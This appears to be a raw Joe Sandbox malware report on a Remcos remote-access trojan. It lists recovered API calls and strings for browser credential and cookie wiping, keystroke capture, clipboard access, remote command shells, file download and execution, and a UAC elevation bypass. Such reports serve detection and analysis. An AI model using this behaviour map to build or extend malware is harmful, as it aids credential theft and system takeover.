                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                  • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                  • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                  • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                  • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                  • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                  • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                  • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                  • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                  • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                  • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                  • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                • API String ID: 2918587301-599666313
                                                                                                • Opcode ID: 3c7ded4f7b91f9f17cc42a3943528b63886410a8f13f5aa197d5eceae44939b9
                                                                                                • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                • Opcode Fuzzy Hash: 3c7ded4f7b91f9f17cc42a3943528b63886410a8f13f5aa197d5eceae44939b9
                                                                                                • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                • API String ID: 3815868655-81343324
                                                                                                • Opcode ID: 640d02081630ce81dd3a23a2c8a108a12bd7e4dab00f5e736ae882909f3da4d2
                                                                                                • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                • Opcode Fuzzy Hash: 640d02081630ce81dd3a23a2c8a108a12bd7e4dab00f5e736ae882909f3da4d2
                                                                                                • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                  • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                  • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                  • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                  • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                • API String ID: 65172268-860466531
                                                                                                • Opcode ID: 6373268320b577883abb576b1dd954259a5e9a0d5e37612e608bbbe8abd5bb10
                                                                                                • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                • Opcode Fuzzy Hash: 6373268320b577883abb576b1dd954259a5e9a0d5e37612e608bbbe8abd5bb10
                                                                                                • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                • API String ID: 1164774033-3681987949
                                                                                                • Opcode ID: 1c90d7a3c299169f6363f3f0942c76783c48e0e716f945347037824cffd895d8
                                                                                                • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                • Opcode Fuzzy Hash: 1c90d7a3c299169f6363f3f0942c76783c48e0e716f945347037824cffd895d8
                                                                                                • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$Close$File$FirstNext
                                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                • API String ID: 3527384056-432212279
                                                                                                • Opcode ID: bb1a5bee213c381b64ddbf92fd809f5da95ece86f667474aed882a00f6a907ed
                                                                                                • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                • Opcode Fuzzy Hash: bb1a5bee213c381b64ddbf92fd809f5da95ece86f667474aed882a00f6a907ed
                                                                                                • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                  • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                • API String ID: 726551946-3025026198
                                                                                                • Opcode ID: 44e9be4fe56ddda769b27416e029fb37a6138cf2d52f58cb8d7ee8808ed05c56
                                                                                                • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                • Opcode Fuzzy Hash: 44e9be4fe56ddda769b27416e029fb37a6138cf2d52f58cb8d7ee8808ed05c56
                                                                                                • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 004159C7
                                                                                                • EmptyClipboard.USER32 ref: 004159D5
                                                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                • CloseClipboard.USER32 ref: 00415A5A
                                                                                                • OpenClipboard.USER32 ref: 00415A61
                                                                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                • CloseClipboard.USER32 ref: 00415A89
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                • String ID:
                                                                                                • API String ID: 3520204547-0
                                                                                                • Opcode ID: 2a1386c91a3013a704f514e3dbf9768ee6ffa9c8b61bbb4a0d43227320b98d4b
                                                                                                • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                • Opcode Fuzzy Hash: 2a1386c91a3013a704f514e3dbf9768ee6ffa9c8b61bbb4a0d43227320b98d4b
                                                                                                • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                • String ID: 8[G
                                                                                                • API String ID: 1888522110-1691237782
                                                                                                • Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                • Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00406788
                                                                                                • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Object_wcslen
                                                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                • API String ID: 240030777-3166923314
                                                                                                • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                APIs
                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                • GetLastError.KERNEL32 ref: 00419935
                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                • String ID:
                                                                                                • API String ID: 3587775597-0
                                                                                                • Opcode ID: 21306a6d170464e398bc9c276bf9a537ab87cc1f28e8c9600cdaabf4a7e3423f
                                                                                                • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                • Opcode Fuzzy Hash: 21306a6d170464e398bc9c276bf9a537ab87cc1f28e8c9600cdaabf4a7e3423f
                                                                                                • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                • String ID:
                                                                                                • API String ID: 2341273852-0
                                                                                                • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Find$CreateFirstNext
                                                                                                • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                • API String ID: 341183262-3780268858
                                                                                                • Opcode ID: 5cf0a3bc43e1aeca7a1fdf8e8c6366a9e7020da5eed0448e09762ca7f956a901
                                                                                                • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                • Opcode Fuzzy Hash: 5cf0a3bc43e1aeca7a1fdf8e8c6366a9e7020da5eed0448e09762ca7f956a901
                                                                                                • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                APIs
                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                • API String ID: 2127411465-314212984
                                                                                                • Opcode ID: 2fcb7f26fc495b18e9ee4ed0816a0069380d4d89fb54b819e432e583a1d7f073
                                                                                                • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                                • Opcode Fuzzy Hash: 2fcb7f26fc495b18e9ee4ed0816a0069380d4d89fb54b819e432e583a1d7f073
                                                                                                • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                • GetLastError.KERNEL32 ref: 0040B261
                                                                                                Strings
                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                • UserProfile, xrefs: 0040B227
                                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                • API String ID: 2018770650-1062637481
                                                                                                • Opcode ID: 093e2210f0edd2306c37cbcd3a4d89727b881328f0745d53c39545fa67deff86
                                                                                                • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                • Opcode Fuzzy Hash: 093e2210f0edd2306c37cbcd3a4d89727b881328f0745d53c39545fa67deff86
                                                                                                • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                • GetLastError.KERNEL32 ref: 00416B02
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                • String ID: SeShutdownPrivilege
                                                                                                • API String ID: 3534403312-3733053543
                                                                                                • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
